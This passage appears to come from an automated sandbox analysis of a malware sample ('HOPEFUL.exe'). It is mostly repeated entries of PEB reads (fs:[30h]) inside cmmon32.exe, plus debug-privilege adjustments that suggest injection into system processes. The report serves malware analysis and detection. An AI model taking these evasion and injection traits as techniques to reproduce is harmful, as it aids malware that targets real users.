Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E00050 mov eax, dword ptr fs:[00000030h]	19_2_04E00050
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E00050 mov eax, dword ptr fs:[00000030h]	19_2_04E00050
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E7C450 mov eax, dword ptr fs:[00000030h]	19_2_04E7C450
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E7C450 mov eax, dword ptr fs:[00000030h]	19_2_04E7C450
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1002D mov eax, dword ptr fs:[00000030h]	19_2_04E1002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1002D mov eax, dword ptr fs:[00000030h]	19_2_04E1002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1002D mov eax, dword ptr fs:[00000030h]	19_2_04E1002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1002D mov eax, dword ptr fs:[00000030h]	19_2_04E1002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1002D mov eax, dword ptr fs:[00000030h]	19_2_04E1002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1BC2C mov eax, dword ptr fs:[00000030h]	19_2_04E1BC2C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB740D mov eax, dword ptr fs:[00000030h]	19_2_04EB740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB740D mov eax, dword ptr fs:[00000030h]	19_2_04EB740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB740D mov eax, dword ptr fs:[00000030h]	19_2_04EB740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]	19_2_04EA1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]	19_2_04EA1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]	19_2_04EA1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]	19_2_04EA1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]	19_2_04EA1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]	19_2_04EA1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]	19_2_04EA1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]	19_2_04EA1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]	19_2_04EA1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]	19_2_04EA1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]	19_2_04EA1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]	19_2_04EA1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]	19_2_04EA1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]	19_2_04EA1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E66C0A mov eax, dword ptr fs:[00000030h]	19_2_04E66C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E66C0A mov eax, dword ptr fs:[00000030h]	19_2_04E66C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E66C0A mov eax, dword ptr fs:[00000030h]	19_2_04E66C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E66C0A mov eax, dword ptr fs:[00000030h]	19_2_04E66C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E67016 mov eax, dword ptr fs:[00000030h]	19_2_04E67016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E67016 mov eax, dword ptr fs:[00000030h]	19_2_04E67016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E67016 mov eax, dword ptr fs:[00000030h]	19_2_04E67016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DFB02A mov eax, dword ptr fs:[00000030h]	19_2_04DFB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DFB02A mov eax, dword ptr fs:[00000030h]	19_2_04DFB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DFB02A mov eax, dword ptr fs:[00000030h]	19_2_04DFB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DFB02A mov eax, dword ptr fs:[00000030h]	19_2_04DFB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB4015 mov eax, dword ptr fs:[00000030h]	19_2_04EB4015
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB4015 mov eax, dword ptr fs:[00000030h]	19_2_04EB4015
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E741E8 mov eax, dword ptr fs:[00000030h]	19_2_04E741E8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E98DF1 mov eax, dword ptr fs:[00000030h]	19_2_04E98DF1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E66DC9 mov eax, dword ptr fs:[00000030h]	19_2_04E66DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E66DC9 mov eax, dword ptr fs:[00000030h]	19_2_04E66DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E66DC9 mov eax, dword ptr fs:[00000030h]	19_2_04E66DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E66DC9 mov ecx, dword ptr fs:[00000030h]	19_2_04E66DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E66DC9 mov eax, dword ptr fs:[00000030h]	19_2_04E66DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E66DC9 mov eax, dword ptr fs:[00000030h]	19_2_04E66DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DEB1E1 mov eax, dword ptr fs:[00000030h]	19_2_04DEB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DEB1E1 mov eax, dword ptr fs:[00000030h]	19_2_04DEB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DEB1E1 mov eax, dword ptr fs:[00000030h]	19_2_04DEB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DFD5E0 mov eax, dword ptr fs:[00000030h]	19_2_04DFD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DFD5E0 mov eax, dword ptr fs:[00000030h]	19_2_04DFD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E135A1 mov eax, dword ptr fs:[00000030h]	19_2_04E135A1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E669A6 mov eax, dword ptr fs:[00000030h]	19_2_04E669A6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E161A0 mov eax, dword ptr fs:[00000030h]	19_2_04E161A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E161A0 mov eax, dword ptr fs:[00000030h]	19_2_04E161A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE2D8A mov eax, dword ptr fs:[00000030h]	19_2_04DE2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE2D8A mov eax, dword ptr fs:[00000030h]	19_2_04DE2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE2D8A mov eax, dword ptr fs:[00000030h]	19_2_04DE2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE2D8A mov eax, dword ptr fs:[00000030h]	19_2_04DE2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE2D8A mov eax, dword ptr fs:[00000030h]	19_2_04DE2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E11DB5 mov eax, dword ptr fs:[00000030h]	19_2_04E11DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E11DB5 mov eax, dword ptr fs:[00000030h]	19_2_04E11DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E11DB5 mov eax, dword ptr fs:[00000030h]	19_2_04E11DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E651BE mov eax, dword ptr fs:[00000030h]	19_2_04E651BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E651BE mov eax, dword ptr fs:[00000030h]	19_2_04E651BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E651BE mov eax, dword ptr fs:[00000030h]	19_2_04E651BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E651BE mov eax, dword ptr fs:[00000030h]	19_2_04E651BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E12581 mov eax, dword ptr fs:[00000030h]	19_2_04E12581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E12581 mov eax, dword ptr fs:[00000030h]	19_2_04E12581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E12581 mov eax, dword ptr fs:[00000030h]	19_2_04E12581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E12581 mov eax, dword ptr fs:[00000030h]	19_2_04E12581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E0C182 mov eax, dword ptr fs:[00000030h]	19_2_04E0C182
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1A185 mov eax, dword ptr fs:[00000030h]	19_2_04E1A185
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E12990 mov eax, dword ptr fs:[00000030h]	19_2_04E12990
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1FD9B mov eax, dword ptr fs:[00000030h]	19_2_04E1FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1FD9B mov eax, dword ptr fs:[00000030h]	19_2_04E1FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E0C577 mov eax, dword ptr fs:[00000030h]	19_2_04E0C577
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E0C577 mov eax, dword ptr fs:[00000030h]	19_2_04E0C577
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E23D43 mov eax, dword ptr fs:[00000030h]	19_2_04E23D43
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E0B944 mov eax, dword ptr fs:[00000030h]	19_2_04E0B944
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E0B944 mov eax, dword ptr fs:[00000030h]	19_2_04E0B944
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E63540 mov eax, dword ptr fs:[00000030h]	19_2_04E63540
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DEB171 mov eax, dword ptr fs:[00000030h]	19_2_04DEB171
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DEB171 mov eax, dword ptr fs:[00000030h]	19_2_04DEB171
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E07D50 mov eax, dword ptr fs:[00000030h]	19_2_04E07D50
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DEC962 mov eax, dword ptr fs:[00000030h]	19_2_04DEC962
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E04120 mov eax, dword ptr fs:[00000030h]	19_2_04E04120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E04120 mov eax, dword ptr fs:[00000030h]	19_2_04E04120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E04120 mov eax, dword ptr fs:[00000030h]	19_2_04E04120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E04120 mov eax, dword ptr fs:[00000030h]	19_2_04E04120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E04120 mov ecx, dword ptr fs:[00000030h]	19_2_04E04120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E6A537 mov eax, dword ptr fs:[00000030h]	19_2_04E6A537
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E14D3B mov eax, dword ptr fs:[00000030h]	19_2_04E14D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E14D3B mov eax, dword ptr fs:[00000030h]	19_2_04E14D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E14D3B mov eax, dword ptr fs:[00000030h]	19_2_04E14D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1513A mov eax, dword ptr fs:[00000030h]	19_2_04E1513A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1513A mov eax, dword ptr fs:[00000030h]	19_2_04E1513A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE9100 mov eax, dword ptr fs:[00000030h]	19_2_04DE9100
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE9100 mov eax, dword ptr fs:[00000030h]	19_2_04DE9100
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE9100 mov eax, dword ptr fs:[00000030h]	19_2_04DE9100
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB8D34 mov eax, dword ptr fs:[00000030h]	19_2_04EB8D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]	19_2_04DF3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]	19_2_04DF3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]	19_2_04DF3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]	19_2_04DF3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]	19_2_04DF3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]	19_2_04DF3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]	19_2_04DF3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]	19_2_04DF3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]	19_2_04DF3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]	19_2_04DF3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]	19_2_04DF3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]	19_2_04DF3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]	19_2_04DF3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DEAD30 mov eax, dword ptr fs:[00000030h]	19_2_04DEAD30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E116E0 mov ecx, dword ptr fs:[00000030h]	19_2_04E116E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E12AE4 mov eax, dword ptr fs:[00000030h]	19_2_04E12AE4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E28EC7 mov eax, dword ptr fs:[00000030h]	19_2_04E28EC7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E9FEC0 mov eax, dword ptr fs:[00000030h]	19_2_04E9FEC0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E12ACB mov eax, dword ptr fs:[00000030h]	19_2_04E12ACB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E136CC mov eax, dword ptr fs:[00000030h]	19_2_04E136CC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB8ED6 mov eax, dword ptr fs:[00000030h]	19_2_04EB8ED6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF76E2 mov eax, dword ptr fs:[00000030h]	19_2_04DF76E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E646A7 mov eax, dword ptr fs:[00000030h]	19_2_04E646A7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB0EA5 mov eax, dword ptr fs:[00000030h]	19_2_04EB0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB0EA5 mov eax, dword ptr fs:[00000030h]	19_2_04EB0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB0EA5 mov eax, dword ptr fs:[00000030h]	19_2_04EB0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1FAB0 mov eax, dword ptr fs:[00000030h]	19_2_04E1FAB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E7FE87 mov eax, dword ptr fs:[00000030h]	19_2_04E7FE87
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DFAAB0 mov eax, dword ptr fs:[00000030h]	19_2_04DFAAB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DFAAB0 mov eax, dword ptr fs:[00000030h]	19_2_04DFAAB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1D294 mov eax, dword ptr fs:[00000030h]	19_2_04E1D294
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1D294 mov eax, dword ptr fs:[00000030h]	19_2_04E1D294
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE52A5 mov eax, dword ptr fs:[00000030h]	19_2_04DE52A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE52A5 mov eax, dword ptr fs:[00000030h]	19_2_04DE52A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE52A5 mov eax, dword ptr fs:[00000030h]	19_2_04DE52A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE52A5 mov eax, dword ptr fs:[00000030h]	19_2_04DE52A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE52A5 mov eax, dword ptr fs:[00000030h]	19_2_04DE52A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E9B260 mov eax, dword ptr fs:[00000030h]	19_2_04E9B260
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E9B260 mov eax, dword ptr fs:[00000030h]	19_2_04E9B260
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB8A62 mov eax, dword ptr fs:[00000030h]	19_2_04EB8A62
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E0AE73 mov eax, dword ptr fs:[00000030h]	19_2_04E0AE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E0AE73 mov eax, dword ptr fs:[00000030h]	19_2_04E0AE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E0AE73 mov eax, dword ptr fs:[00000030h]	19_2_04E0AE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E0AE73 mov eax, dword ptr fs:[00000030h]	19_2_04E0AE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E0AE73 mov eax, dword ptr fs:[00000030h]	19_2_04E0AE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E2927A mov eax, dword ptr fs:[00000030h]	19_2_04E2927A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE9240 mov eax, dword ptr fs:[00000030h]	19_2_04DE9240
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE9240 mov eax, dword ptr fs:[00000030h]	19_2_04DE9240
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE9240 mov eax, dword ptr fs:[00000030h]	19_2_04DE9240
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE9240 mov eax, dword ptr fs:[00000030h]	19_2_04DE9240
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]	19_2_04DF7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]	19_2_04DF7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]	19_2_04DF7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]	19_2_04DF7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]	19_2_04DF7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]	19_2_04DF7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E74257 mov eax, dword ptr fs:[00000030h]	19_2_04E74257
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF766D mov eax, dword ptr fs:[00000030h]	19_2_04DF766D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DEAA16 mov eax, dword ptr fs:[00000030h]	19_2_04DEAA16
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DEAA16 mov eax, dword ptr fs:[00000030h]	19_2_04DEAA16
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E24A2C mov eax, dword ptr fs:[00000030h]	19_2_04E24A2C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E24A2C mov eax, dword ptr fs:[00000030h]	19_2_04E24A2C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE5210 mov eax, dword ptr fs:[00000030h]	19_2_04DE5210
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE5210 mov ecx, dword ptr fs:[00000030h]	19_2_04DE5210
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE5210 mov eax, dword ptr fs:[00000030h]	19_2_04DE5210
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE5210 mov eax, dword ptr fs:[00000030h]	19_2_04DE5210
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF8A0A mov eax, dword ptr fs:[00000030h]	19_2_04DF8A0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E9FE3F mov eax, dword ptr fs:[00000030h]	19_2_04E9FE3F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DEC600 mov eax, dword ptr fs:[00000030h]	19_2_04DEC600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DEC600 mov eax, dword ptr fs:[00000030h]	19_2_04DEC600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DEC600 mov eax, dword ptr fs:[00000030h]	19_2_04DEC600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E18E00 mov eax, dword ptr fs:[00000030h]	19_2_04E18E00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E03A1C mov eax, dword ptr fs:[00000030h]	19_2_04E03A1C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1A61C mov eax, dword ptr fs:[00000030h]	19_2_04E1A61C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1A61C mov eax, dword ptr fs:[00000030h]	19_2_04E1A61C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DEE620 mov eax, dword ptr fs:[00000030h]	19_2_04DEE620
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]	19_2_04E103E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]	19_2_04E103E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]	19_2_04E103E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]	19_2_04E103E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]	19_2_04E103E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]	19_2_04E103E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E237F5 mov eax, dword ptr fs:[00000030h]	19_2_04E237F5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E653CA mov eax, dword ptr fs:[00000030h]	19_2_04E653CA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E653CA mov eax, dword ptr fs:[00000030h]	19_2_04E653CA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF8794 mov eax, dword ptr fs:[00000030h]	19_2_04DF8794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E14BAD mov eax, dword ptr fs:[00000030h]	19_2_04E14BAD
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E14BAD mov eax, dword ptr fs:[00000030h]	19_2_04E14BAD
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E14BAD mov eax, dword ptr fs:[00000030h]	19_2_04E14BAD
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB5BA5 mov eax, dword ptr fs:[00000030h]	19_2_04EB5BA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF1B8F mov eax, dword ptr fs:[00000030h]	19_2_04DF1B8F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF1B8F mov eax, dword ptr fs:[00000030h]	19_2_04DF1B8F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA138A mov eax, dword ptr fs:[00000030h]	19_2_04EA138A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E9D380 mov ecx, dword ptr fs:[00000030h]	19_2_04E9D380
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1B390 mov eax, dword ptr fs:[00000030h]	19_2_04E1B390
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E67794 mov eax, dword ptr fs:[00000030h]	19_2_04E67794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E67794 mov eax, dword ptr fs:[00000030h]	19_2_04E67794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E67794 mov eax, dword ptr fs:[00000030h]	19_2_04E67794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E12397 mov eax, dword ptr fs:[00000030h]	19_2_04E12397
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB8F6A mov eax, dword ptr fs:[00000030h]	19_2_04EB8F6A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DEF358 mov eax, dword ptr fs:[00000030h]	19_2_04DEF358
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E13B7A mov eax, dword ptr fs:[00000030h]	19_2_04E13B7A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E13B7A mov eax, dword ptr fs:[00000030h]	19_2_04E13B7A

Source: C:\Users\user\Desktop\HOPEFUL.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\HOPEFUL.exe

Memory allocated: page read and write | page guard

